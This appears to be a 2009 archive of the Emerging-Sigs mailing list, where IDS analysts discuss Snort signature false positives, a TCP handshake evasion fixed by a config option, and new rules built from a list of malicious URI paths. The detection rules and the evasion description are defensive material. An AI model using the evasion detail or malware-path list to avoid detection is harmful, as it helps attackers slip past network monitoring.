        2010370 || ET WEB_CLIENT ACTIVEX Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Function Call Attempt || cve,2009-3033 || url,www.securityfocus.com/bid/37092 || url,securitytracker.com/alerts/2009/Nov/1023238.html
        2010371 || ET SCAN Amap TCP Service Scan Detected || url,freeworld.thc.org/thc-amap/
        2010372 || ET SCAN Amap UDP Service Scan Detected || url,freeworld.thc.org/thc-amap/


From pepperjack at afferentsecurity.com  Tue Dec  1 16:21:23 2009
From: pepperjack at afferentsecurity.com (Jack Pepper)
Date: Tue, 01 Dec 2009 15:21:23 -0600
Subject: [Emerging-Sigs] FP on 2003055
In-Reply-To: <F236CDCE34685A458D315422458642E201D307E1@pine.nhrs.org>
References: <F236CDCE34685A458D315422458642E201D307E1@pine.nhrs.org>
Message-ID: <20091201152123.rfxny5c9cck4480c@mail.afferentsecurity.com>

I fixed it like this:

/etc/oinkmaster.conf:  disablesid 2003055

;)

jp

Quoting "Weir, Jason" <jason.weir at nhrs.org>:

> I'm seeing falses on 2003055
>
> alert tcp $HOME_NET !21:902 -> any any (msg:"ET MALWARE Suspicious 220
> Banner on Local Port"; flow:from_server,established; content:"220";
> offset:0; depth:4; pcre:"/220[- ]/"; classtype:non-standard-protocol;
> reference:url,doc.emergingthreats.net/bin/view/Main/2003055;
> reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MA
> LWARE_Off_Port_FTP; sid:2003055; rev:5;)
>
> is there any better way to determine if it's actually a banner?  I'm
> seeing regular SQL traffic with 220 in it that looks nothing like a
> banner.
>
> Oh and by the way how was the excluded port range defined?
>
> Here is an example of my traffic that is triggering..
>
> 000 : 32 32 30 30 35 30 20 20 20 20 20 20 20 20 20 20   220050
> 010 : 20 20 20 20 D1 14 00 32 32 30 30 35 32 20 20 20       ...220052
> 020 : 20 20 20 20 20 20 20 20 20 20 20 D1 14 00 32 32              ...22
> 030 : 30 30 38 36 20 20 20 20 20 20 20 20 20 20 20 20   0086
> 040 : 20 20 D1 14 00 32 32 30 31 31 36 20 20 20 20 20     ...220116
> 050 : 20 20 20 20 20 20 20 20 20 D1 14 00 32 32 30 31            ...2201
> 060 : 31 38 20 20 20 20 20 20 20 20 20 20 20 20 20 20   18
> 070 : D1 14 00 32 32 30 31 35 32 20 20 20 20 20 20 20   ...220152
> 080 : 20 20 20 20 20 20 20 D1 14 00 32 32 30 31 36 39          ...220169
> 090 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 D1 14                 ..
> 0a0 : 00 32 32 30 31 38 34 20 20 20 20 20 20 20 20 20   .220184
> 0b0 : 20 20 20 20 20 D1 14 00 32 32 30 32 31 36 20 20        ...220216
> 0c0 : 20 20 20 20 20 20 20 20 20 20 20 20 D1 14 00 32               ...2
> 0d0 : 32 30 32 32 30 20 20 20 20 20 20 20 20 20 20 20   20220
> 0e0 : 20 20 20 D1 14 00 32 32 30 32 33 33 20 20 20 20      ...220233
> 0f0 : 20 20 20 20 20 20 20 20 20 20 D1 14 00 32 32 30             ...220
> 100 : 32 33 35 20 20 20 20 20 20 20 20 20 20 20 20 20   235
> 110 : 20 D1 14 00 32 32 30 32 36 37 20 20 20 20 20 20    ...220267
> 120 : 20 20 20 20 20 20 20 20 D1 14 00 32 32 30 32 38           ...22028
> 130 : 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 D1   4              .
> 140 : 14 00 32 32 30 33 32 30 20 20 20 20 20 20 20 20   ..220320
> 150 : 20 20 20 20 20 20 D1 14 00 32 32 30 33 35 32 20         ...220352
>
>
> -J
>
>
>
>
>
> _____________________________________________________________________________________________
>
> Please visit www.nhrs.org to subscribe to NHRS email announcements  
> and updates.
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com


From jason.weir at nhrs.org  Tue Dec  1 16:33:29 2009
From: jason.weir at nhrs.org (Weir, Jason)
Date: Tue, 1 Dec 2009 16:33:29 -0500
Subject: [Emerging-Sigs] FP on 2003055
In-Reply-To: <20091201152123.rfxny5c9cck4480c@mail.afferentsecurity.com>
Message-ID: <F236CDCE34685A458D315422458642E201D307E2@pine.nhrs.org>

There's one in every crowd ;)

It seems that's my first response for every FP and today I had a change
of heart and you squashed it...

-J

-----Original Message-----
From: emerging-sigs-bounces at emergingthreats.net
[mailto:emerging-sigs-bounces at emergingthreats.net] On Behalf Of Jack
Pepper
Sent: Tuesday, December 01, 2009 4:21 PM
To: emerging-sigs at emergingthreats.net
Subject: Re: [Emerging-Sigs] FP on 2003055


I fixed it like this:

/etc/oinkmaster.conf:  disablesid 2003055

;)

jp

Quoting "Weir, Jason" <jason.weir at nhrs.org>:

> I'm seeing falses on 2003055
>
> alert tcp $HOME_NET !21:902 -> any any (msg:"ET MALWARE Suspicious 220
> Banner on Local Port"; flow:from_server,established; content:"220";
> offset:0; depth:4; pcre:"/220[- ]/"; classtype:non-standard-protocol;
> reference:url,doc.emergingthreats.net/bin/view/Main/2003055;
>
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MA
> LWARE_Off_Port_FTP; sid:2003055; rev:5;)
>
> is there any better way to determine if it's actually a banner?  I'm
> seeing regular SQL traffic with 220 in it that looks nothing like a
> banner.
>
> Oh and by the way how was the excluded port range defined?
>
> Here is an example of my traffic that is triggering..
>
> 000 : 32 32 30 30 35 30 20 20 20 20 20 20 20 20 20 20   220050
> 010 : 20 20 20 20 D1 14 00 32 32 30 30 35 32 20 20 20       ...220052
> 020 : 20 20 20 20 20 20 20 20 20 20 20 D1 14 00 32 32
...22
> 030 : 30 30 38 36 20 20 20 20 20 20 20 20 20 20 20 20   0086
> 040 : 20 20 D1 14 00 32 32 30 31 31 36 20 20 20 20 20     ...220116
> 050 : 20 20 20 20 20 20 20 20 20 D1 14 00 32 32 30 31
...2201
> 060 : 31 38 20 20 20 20 20 20 20 20 20 20 20 20 20 20   18
> 070 : D1 14 00 32 32 30 31 35 32 20 20 20 20 20 20 20   ...220152
> 080 : 20 20 20 20 20 20 20 D1 14 00 32 32 30 31 36 39
...220169
> 090 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 D1 14
..
> 0a0 : 00 32 32 30 31 38 34 20 20 20 20 20 20 20 20 20   .220184
> 0b0 : 20 20 20 20 20 D1 14 00 32 32 30 32 31 36 20 20        ...220216
> 0c0 : 20 20 20 20 20 20 20 20 20 20 20 20 D1 14 00 32
...2
> 0d0 : 32 30 32 32 30 20 20 20 20 20 20 20 20 20 20 20   20220
> 0e0 : 20 20 20 D1 14 00 32 32 30 32 33 33 20 20 20 20      ...220233
> 0f0 : 20 20 20 20 20 20 20 20 20 20 D1 14 00 32 32 30
...220
> 100 : 32 33 35 20 20 20 20 20 20 20 20 20 20 20 20 20   235
> 110 : 20 D1 14 00 32 32 30 32 36 37 20 20 20 20 20 20    ...220267
> 120 : 20 20 20 20 20 20 20 20 D1 14 00 32 32 30 32 38
...22028
> 130 : 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 D1   4
.
> 140 : 14 00 32 32 30 33 32 30 20 20 20 20 20 20 20 20   ..220320
> 150 : 20 20 20 20 20 20 D1 14 00 32 32 30 33 35 32 20
...220352
>
>
> -J
>
>
>
>
>
>
________________________________________________________________________
_____________________
>
> Please visit www.nhrs.org to subscribe to NHRS email announcements  
> and updates.
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>



-- 

Framework?  I don't need no stinking framework!

----------------------------------------------------------------
@fferent Security Labs:  Isolate/Insulate/Innovate  
http://www.afferentsecurity.com

_______________________________________________
Emerging-sigs mailing list
Emerging-sigs at emergingthreats.net
http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs



________________________________________________________________________
_____________________

Please visit www.nhrs.org to subscribe to NHRS email announcements and
updates.


_____________________________________________________________________________________________

Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.

From molney at sourcefire.com  Tue Dec  1 15:53:18 2009
From: molney at sourcefire.com (Matt Olney)
Date: Tue, 1 Dec 2009 15:53:18 -0500
Subject: [Emerging-Sigs] [Snort-users] TCP Portals: The Handshake's a
	Lie!
In-Reply-To: <1259099377.4146.6.camel@localhost>
References: <f1b6c340911171211m1773a699k37498ed5685b48f9@mail.gmail.com>
	<98fce1870911171237x50cb7c09w3229df3802b371af@mail.gmail.com>
	<910b913d0911200812m12a3c11ftdac53fc66169f1ce@mail.gmail.com>
	<1259038889.93338.90.camel@localhost>
	<910b913d0911232130n4190a9bbx289d5388826ff0f2@mail.gmail.com>
	<4B0C0639.5030405@gmail.com> <1259099377.4146.6.camel@localhost>
Message-ID: <77e259cc0912011253k7216da6bl44ba9ca56d06ee01@mail.gmail.com>

Howdy all,

First, as I'm not subscribed to the Emerging-sigs list, I'm not
certain if this will make it there, if someone would be so kinds as to
foward it, I would be grateful.

I'd like to close the loop a little on the "4-way handshake" problem.
We did some preliminary investigation into this and found that it was
possible to bypass rules using this.  The VRT did the initial testing
and the case was then passed to the Snort team.  Their testing
revealed a config change that would ensure that the snort rules would
alert properly in the face of a malicious server implementing a 4-way
capable stack.

The modification is to add the following value to your "preprocessor
stream5_tcp:" line:

require_3whs

To be clear, in the testing I'm going to show below, here are my values:

(failed test)     preprocessor stream5_tcp: policy first,
use_static_footprint_sizes
(passed test)  preprocessor stream5_tcp: policy first,
use_static_footprint_sizes, require_3whs

Here is the rules file I used to test:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Get with
http_inspect method check"; flow: to_server, established;
content:"GET"; http_method; sid: 3;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Get with
standard content match and flow check"; flow: to_server, established;
content:"GET"; http_method; sid: 4;)
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Get with
standard content match and no flow check"; content:"GET"; sid: 6;)

Here is the output I ran, failed tests first: (Using the fake.pcap
from http://malforge.com/node/20):

Snort Test Suite v.0.3.0

Alerts:
1:6:0           Get with standard content match and no flow check
          Alerts: 1

In this case, we only alerted on the standard content match without
flow enforcement.  This indicates that stream5 has incorrectly
interpreted the stream.  Remember that both the flow keywords, as well
as the http_method modifier require stream5 to have properly marked a
stream in order to function.

Here are the tests after I added the require_3whs:

Snort Test Suite v.0.3.0

Alerts:
1:3:0           Get with http_inspect method check
          Alerts: 1
1:4:0           Get with standard content match and flow check
          Alerts: 1
1:6:0           Get with standard content match and no flow check
          Alerts: 1

We now correctly alert on checks in both the http_inspect preprocessor
and the flow direction.

I'll put together a blog post, but since this issue was discussed
here, I wanted to drop the information so you had our answer.

Matt

From molney at sourcefire.com  Tue Dec  1 15:55:37 2009
From: molney at sourcefire.com (Matt Olney)
Date: Tue, 1 Dec 2009 15:55:37 -0500
Subject: [Emerging-Sigs] [Snort-users] TCP Portals: The Handshake's a
	Lie!
In-Reply-To: <77e259cc0912011253k7216da6bl44ba9ca56d06ee01@mail.gmail.com>
References: <f1b6c340911171211m1773a699k37498ed5685b48f9@mail.gmail.com>
	<98fce1870911171237x50cb7c09w3229df3802b371af@mail.gmail.com>
	<910b913d0911200812m12a3c11ftdac53fc66169f1ce@mail.gmail.com>
	<1259038889.93338.90.camel@localhost>
	<910b913d0911232130n4190a9bbx289d5388826ff0f2@mail.gmail.com>
	<4B0C0639.5030405@gmail.com> <1259099377.4146.6.camel@localhost>
	<77e259cc0912011253k7216da6bl44ba9ca56d06ee01@mail.gmail.com>
Message-ID: <77e259cc0912011255i1b0056c4g640ca3d550f10f2c@mail.gmail.com>

Also, I wanted to thank Russ Combs, the Sourcefire developer who
worked on this.  It's damn handy to be able to walk down the hall and
chat snort internals with the folks that built it, and we at the VRT
abuse this privilege regularly.

Thanks!

Matt

On Tue, Dec 1, 2009 at 3:53 PM, Matt Olney <molney at sourcefire.com> wrote:
> Howdy all,
>
> First, as I'm not subscribed to the Emerging-sigs list, I'm not
> certain if this will make it there, if someone would be so kinds as to
> foward it, I would be grateful.
>
> I'd like to close the loop a little on the "4-way handshake" problem.
> We did some preliminary investigation into this and found that it was
> possible to bypass rules using this. ?The VRT did the initial testing
> and the case was then passed to the Snort team. ?Their testing
> revealed a config change that would ensure that the snort rules would
> alert properly in the face of a malicious server implementing a 4-way
> capable stack.
>
> The modification is to add the following value to your "preprocessor
> stream5_tcp:" line:
>
> require_3whs
>
> To be clear, in the testing I'm going to show below, here are my values:
>
> (failed test) ? ? preprocessor stream5_tcp: policy first,
> use_static_footprint_sizes
> (passed test) ?preprocessor stream5_tcp: policy first,
> use_static_footprint_sizes, require_3whs
>
> Here is the rules file I used to test:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Get with
> http_inspect method check"; flow: to_server, established;
> content:"GET"; http_method; sid: 3;)
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Get with
> standard content match and flow check"; flow: to_server, established;
> content:"GET"; http_method; sid: 4;)
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"Get with
> standard content match and no flow check"; content:"GET"; sid: 6;)
>
> Here is the output I ran, failed tests first: (Using the fake.pcap
> from http://malforge.com/node/20):
>
> Snort Test Suite v.0.3.0
>
> Alerts:
> 1:6:0 ? ? ? ? ? Get with standard content match and no flow check
> ? ? ? ? ?Alerts: 1
>
> In this case, we only alerted on the standard content match without
> flow enforcement. ?This indicates that stream5 has incorrectly
> interpreted the stream. ?Remember that both the flow keywords, as well
> as the http_method modifier require stream5 to have properly marked a
> stream in order to function.
>
> Here are the tests after I added the require_3whs:
>
> Snort Test Suite v.0.3.0
>
> Alerts:
> 1:3:0 ? ? ? ? ? Get with http_inspect method check
> ? ? ? ? ?Alerts: 1
> 1:4:0 ? ? ? ? ? Get with standard content match and flow check
> ? ? ? ? ?Alerts: 1
> 1:6:0 ? ? ? ? ? Get with standard content match and no flow check
> ? ? ? ? ?Alerts: 1
>
> We now correctly alert on checks in both the http_inspect preprocessor
> and the flow direction.
>
> I'll put together a blog post, but since this issue was discussed
> here, I wanted to drop the information so you had our answer.
>
> Matt
>

From jason.weir at nhrs.org  Tue Dec  1 16:38:12 2009
From: jason.weir at nhrs.org (Weir, Jason)
Date: Tue, 1 Dec 2009 16:38:12 -0500
Subject: [Emerging-Sigs] Malwareurl.com Top 30 Update
In-Reply-To: <7093D46D-A2D6-44DF-8D0F-2C0C17BC29E7@jonkmans.com>
Message-ID: <F236CDCE34685A458D315422458642E201D307E5@pine.nhrs.org>

Matt,

Let me know the sig # and I'll update the list..

-J

-----Original Message-----
From: Matthew Jonkman [mailto:jonkman at jonkmans.com] 
Sent: Tuesday, December 01, 2009 3:02 PM
To: Weir, Jason
Cc: emerging-sigs at emergingthreats.net
Subject: Re: [Emerging-Sigs] Malwareurl.com Top 30 Update


I like "flash-HQ-plugin.40000.exe" for a sig. Will post something. 

Anyone see anything else we need to get in this list?

Matt


_____________________________________________________________________________________________

Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.

From r.fulton at auckland.ac.nz  Wed Dec  2 03:06:53 2009
From: r.fulton at auckland.ac.nz (Russell Fulton)
Date: Wed, 2 Dec 2009 21:06:53 +1300
Subject: [Emerging-Sigs] Joomla sql injection sig
In-Reply-To: <9255886c0911301735k74bf8d95i429625c6e2639de6@mail.gmail.com>
References: <23E4FB52-E6A0-4E36-B79A-07B116A12AD0@auckland.ac.nz>
	<9255886c0911301735k74bf8d95i429625c6e2639de6@mail.gmail.com>
Message-ID: <946F91D4-32A9-4E1B-8D26-EBCAD3BFC789@auckland.ac.nz>


On 1/12/2009, at 2:35 PM, Rodrigo Montoro(Sp0oKeR) wrote:

> We could use some pcre as I tested since I understand that extid=NUMERIC_VALUE
> 
> re> /extid=.*\D+$/gi
> 

I thought about that but decided that the extid= was probably enough to stop any FP and the pcre would just slow it down.

R

From kevross33 at googlemail.com  Wed Dec  2 06:27:26 2009
From: kevross33 at googlemail.com (Kevin Ross)
Date: Wed, 2 Dec 2009 11:27:26 +0000
Subject: [Emerging-Sigs] sig improvement
Message-ID: <e75cc74a0912020327t15143203n5f59861b53fd27cc@mail.gmail.com>

Hi this is one of my old sigs. I corrected the flow to be before the content
match and incremented the revision number. Re-tested and working fine.

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET SCAN
Httprint Web Server Fingerprint Scan"; flow:to_server,established;
content:"GET|20 2F|antidisestablishmentarianism"; depth:33;
classtype:attempted-recon; reference:url,www.net-square.com/httprint/;
reference:url,www.net-square.com/httprint/httprint_paper.html;
reference:url,doc.emergingthreats.net/2008416; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/SCAN/SCAN_Httprint;
sid:2008416; rev:3;)

Kev
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091202/a1e361ac/attachment.html

From jason.weir at nhrs.org  Wed Dec  2 07:42:10 2009
From: jason.weir at nhrs.org (Weir, Jason)
Date: Wed, 2 Dec 2009 07:42:10 -0500
Subject: [Emerging-Sigs] Malwareurl.com update
Message-ID: <F236CDCE34685A458D315422458642E201D307E9@pine.nhrs.org>

I'm going to send and update to the list in a minute - looks like they
cleaned out their database and have a bunch of new entries.

Maybe something we can use..

-J


_____________________________________________________________________________________________

Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.

From jason.weir at nhrs.org  Wed Dec  2 07:51:40 2009
From: jason.weir at nhrs.org (jason.weir@nhrs.org)
Date: 2 Dec 2009 07:51:40 -0500
Subject: [Emerging-Sigs] Malwareurl.com Top 30 Update
Message-ID: <MAILW1GVKjj5EYhAewO00000011@mail.nhrs.org>

MalewareURL.com Data Contains 29827 Entries - Here are the top 30 (6417)

#    Signature       URI                                                Count    Description                                       
----------------------------------------------------------------------------------------

1    none            cache/readme.pdf                                   941      exploits / redirects to exploits                  
2    none            index.php                                          919      exploits / redirects to exploits                  
3    2010222         ts/in.cgi?pepsi18                                  895      exploits / redirects to exploits                  
4    none            download/install.php                               296      rogue antivirus downloader / internetantiviruspro 
5    none            cache/flash.swf                                    276      exploits / redirects to exploits                  
6    new             downloader.php                                     180      fraudtool.win32.roguesecurity                     
7    2010440         flash-HQ-plugin.40000.exe                          167      fast flux trojan                                  
8    2010050         download/Antivirus_21.exe                          149      rogue antivirus / personal antivirus - fakexpa    
9    none            installer.1.exe                                    147      rogue antivirus downloader / fakeplus             
10   new             ssp/js/common.js                                   138      exploit kit / trojan oficla                       
11   new             ssp/files/annonce.pdf                              138      exploit kit / trojan oficla                       
12   new             ssp/files/sdfg.jar                                 138      exploit kit / trojan oficla                       
13   new             ssp/admin.php                                      138      exploit kit / trojan oficla                       
14   new             ssp/index.php                                      138      exploit kit / trojan oficla                       
15   new             ssp/load.exe                                       138      exploit kit / trojan oficla                       
16   new             ssp/loadjavad.php                                  138      exploit kit / trojan oficla                       
17   new             download/IAInstall.exe                             125      rogue antivirus downloader / internetantiviruspro 
18   none            index.php                                          123      exploits                                          
19   2010221         3/installer/Installer.exe                          123      trojan fakerean                                   
20   2010221         1/installer/Installer.exe                          123      trojan fakerean                                   
21   2010221         2/installer/Installer.exe                          123      trojan fakerean                                   
22   new             rsf/loadjavad.php                                  111      exploits / trojan oficla                          
23   new             rsf/files/annonce.pdf                              111      exploits / trojan oficla                          
24   new             rsf/files/sdfg.jar                                 111      exploits / trojan oficla                          
25   new             rsf/js/common.js                                   111      exploits / trojan oficla                          
26   new             rsf/index.php                                      111      exploits / trojan oficla                          
27   new             hitin.php                                          89       fraudtool.win32.roguesecurity                     
28   none            download.php                                       82       fraudtool.win32.roguesecurity                     
29   none            fkzd/2.htm                                         70       directs to exploits                               
30   new             globaldirectory/updatetool.exe                     68       trojan zbot                                       

From jlay at slave-tothe-box.net  Wed Dec  2 08:09:57 2009
From: jlay at slave-tothe-box.net (James Lay)
Date: Wed, 02 Dec 2009 06:09:57 -0700
Subject: [Emerging-Sigs] FP
Message-ID: <C73BB535.44A1E%jlay@slave-tothe-box.net>

Can someone please explain to me how port 22 is an unusual ssh port?
Thanks:

Dec  2 06:05:17 gateway snort[23247]: [1:2001984:7] ET POLICY SSH session in
progress on Unusual Port [Classification: Misc activity] [Priority: 3]:
{TCP} EXIP:22 -> MYIP:37423
Dec  2 06:05:17 gateway snort[23247]: [1:2001984:7] ET POLICY SSH session in
progress on Unusual Port [Classification: Misc activity] [Priority: 3]:
{TCP} MYIP:37423 -> EXIP:22

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20091202/360e44c0/attachment.html

From bojan.isc at gmail.com  Wed Dec  2 08:38:31 2009
From: bojan.isc at gmail.com (Bojan Zdrnja (SANS ISC))
Date: Wed, 2 Dec 2009 14:38:31 +0100
Subject: [Emerging-Sigs] FP
In-Reply-To: <C73BB535.44A1E%jlay@slave-tothe-box.net>
References: <C73BB535.44A1E%jlay@slave-tothe-box.net>
Message-ID: <9d6a1ae60912020538q1d9cefc8t70bbcb008c38c0b1@mail.gmail.com>

James,

On Wed, Dec 2, 2009 at 2:09 PM, James Lay <jlay at slave-tothe-box.net> wrote:
> Can someone please explain to me how port 22 is an unusual ssh port?
> ?Thanks:
>
> Dec ?2 06:05:17 gateway snort[23247]: [1:2001984:7] ET POLICY SSH session in
> progress on Unusual Port [Classification: Misc activity] [Priority: 3]:
> {TCP} EXIP:22 -> MYIP:37423
> Dec ?2 06:05:17 gateway snort[23247]: [1:2001984:7] ET POLICY SSH session in
> progress on Unusual Port [Classification: Misc activity] [Priority: 3]:
> {TCP} MYIP:37423 -> EXIP:22

Make sure that you have the SSH_PORTS variable set since this rule
uses it to determine on which ports to trigger:

alert tcp any !$SSH_PORTS -> any !$SSH_PORTS (msg:"ET POLICY SSH
session in progress on Unusual Port"; flowbits: isset,is_proto_ssh;
threshold: type both, track by_src, count 2, seconds 300;
classtype:misc-activity;
reference:url,doc.emergingthreats.net/2001984;
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/POLICY/POLICY_Non-Standard_SSH_Port;
sid: 2001984; rev:7;)



Cheers,

Bojan

From jlay at slave-tothe-box.net  Wed Dec  2 08:48:20 2009
From: jlay at slave-tothe-box.net (James Lay)
Date: Wed, 02 Dec 2009 06:48:20 -0700
Subject: [Emerging-Sigs] FP
In-Reply-To: <9d6a1ae60912020538q1d9cefc8t70bbcb008c38c0b1@mail.gmail.com>
Message-ID: <C73BBE34.44A2E%jlay@slave-tothe-box.net>


> On Wed, Dec 2, 2009 at 2:09 PM, James Lay <jlay at slave-tothe-box.net> wrote:
>> Can someone please explain to me how port 22 is an unusual ssh port?
>> ?Thanks:
>> 
>> Dec ?2 06:05:17 gateway snort[23247]: [1:2001984:7] ET POLICY SSH session in
>> progress on Unusual Port [Classification: Misc activity] [Priority: 3]:
>> {TCP} EXIP:22 -> MYIP:37423
>> Dec ?2 06:05:17 gateway snort[23247]: [1:2001984:7] ET POLICY SSH session in
>> progress on Unusual Port [Classification: Misc activity] [Priority: 3]:
>> {TCP} MYIP:37423 -> EXIP:22
> 
> Make sure that you have the SSH_PORTS variable set since this rule
> uses it to determine on which ports to trigger:

Ah bugger....almost every time I think I find a false positive, I end up
finding an issue on my end ;)  Sure as heck my SSH_PORTS was set to my
server port, which isn't 22, but I DO connect out to other machines on the
standard ssh port.  Added 22 and of course the issue went away 8-|  Thanks
for the quick reply and resolution.

James



From mike.cox52 at gmail.com  Wed Dec  2 09:30:41 2009
From: mike.cox52 at gmail.com (Mike Cox)
Date: Wed, 2 Dec 2009 08:30:41 -0600
Subject: [Emerging-Sigs] Malwareurl.com Top 30 Update
In-Reply-To: <MAILW1GVKjj5EYhAewO00000011@mail.nhrs.org>
References: <MAILW1GVKjj5EYhAewO00000011@mail.nhrs.org>
Message-ID: <6116b9e20912020630o41a5df3cm9c319dfdfa3b437e@mail.gmail.com>

Thanks for this intel Jason.  I know these are simple signatures but I
figure I'd beat Kevin Ross to it:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS
MALWARE Potential Malware Download, rogue antivirus downloader
(installer.1.exe)"; flow:established,to_server;
uricontent:"/installer.1.exe"; nocase; classtype:bad-unknown; reference:url,
malwareurl.com; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
sid:2010xxx; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS
MALWARE Potential Malware Download, pdf exploit";
flow:established,to_server; uricontent:"/ssp/files/annonce.pdf"; nocase;
classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
sid:2010xxx; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS
MALWARE Potential Malware Download, java exploit";
flow:established,to_server; uricontent:"/ssp/files/sdfg.jar"; nocase;
classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
sid:2010xxx; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS
MALWARE Potential Malware Download, loadjavad.php exploit";
flow:established,to_server; uricontent:"/ssp/loadjavad.php"; nocase;
classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
sid:2010xxx; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS
MALWARE Potential Malware Download, rogue antivirus (IAInstall.exe)";
flow:established,to_server; uricontent:"/download/IAInstall.exe"; nocase;
classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
sid:2010xxx; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS
MALWARE Potential Malware Download, trojan zbot";
flow:established,to_server; uricontent:"/globaldirectory/updatetool.exe";
nocase; classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
sid:2010xxx; rev:1;)

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS
MALWARE Potential Malware Download, exploit redirect";
flow:established,to_server; uricontent:"/fkzd/2.htm"; nocase;
classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
sid:2010xxx; rev:1;)

Finally, I know SID 2010050 covers this but here is how I would do it:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET CURRENT_EVENTS
MALWARE Potential Malware Download, rogue antivirus";
flow:established,to_server; uricontent:"/download/Antivirus_"; nocase;
uricontent:".exe"; nocase; pcre:"/download\x2FAntivirus_\d+\x2Eexe/Ui";
classtype:bad-unknown; reference:url,malwareurl.com; reference:url,
www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Malwareurl_top_downloads;
sid:2010xxx; rev:1;)

-Mike Cox

On Wed, Dec 2, 2009 at 6:51 AM, <jason.weir at nhrs.org> wrote:

> MalewareURL.com Data Contains 29827 Entries - Here are the top 30 (6417)
>
> #    Signature       URI
>  Count    Description
>
> ----------------------------------------------------------------------------------------
>
> 1    none            cache/readme.pdf                                   941
>      exploits / redirects to exploits
> 2    none            index.php                                          919
>      exploits / redirects to exploits
> 3    2010222         ts/in.cgi?pepsi18                                  895
>      exploits / redirects to exploits
> 4    none            download/install.php                               296
>      rogue antivirus downloader / internetantiviruspro
> 5    none            cache/flash.swf                                    276
>      exploits / redirects to exploits
> 6    new             downloader.php                                     180
>      fraudtool.win32.roguesecurity
> 7    2010440         flash-HQ-plugin.40000.exe                          167
>      fast flux trojan
> 8    2010050         download/Antivirus_21.exe                          149
>      rogue antivirus / personal antivirus - fakexpa
> 9    none            installer.1.exe                                    147
>      rogue antivirus downloader / fakeplus
> 10   new             ssp/js/common.js                                   138
>      exploit kit / trojan oficla
> 11   new             ssp/files/annonce.pdf                              138
>      exploit kit / trojan oficla
> 12   new             ssp/files/sdfg.jar                                 138
>      exploit kit / trojan oficla
> 13   new             ssp/admin.php                                      138
>      exploit kit / trojan oficla
> 14   new             ssp/index.php                                      138
>      exploit kit / trojan oficla
> 15   new             ssp/load.exe                                       138
>      exploit kit / trojan oficla
> 16   new             ssp/loadjavad.php                                  138
>      exploit kit / trojan oficla
> 17   new             download/IAInstall.exe                             125
>      rogue antivirus downloader / internetantiviruspro
> 18   none            index.php                                          123
>      exploits
> 19   2010221         3/installer/Installer.exe                          123
>      trojan fakerean
> 20   2010221         1/installer/Installer.exe                          123
>      trojan fakerean
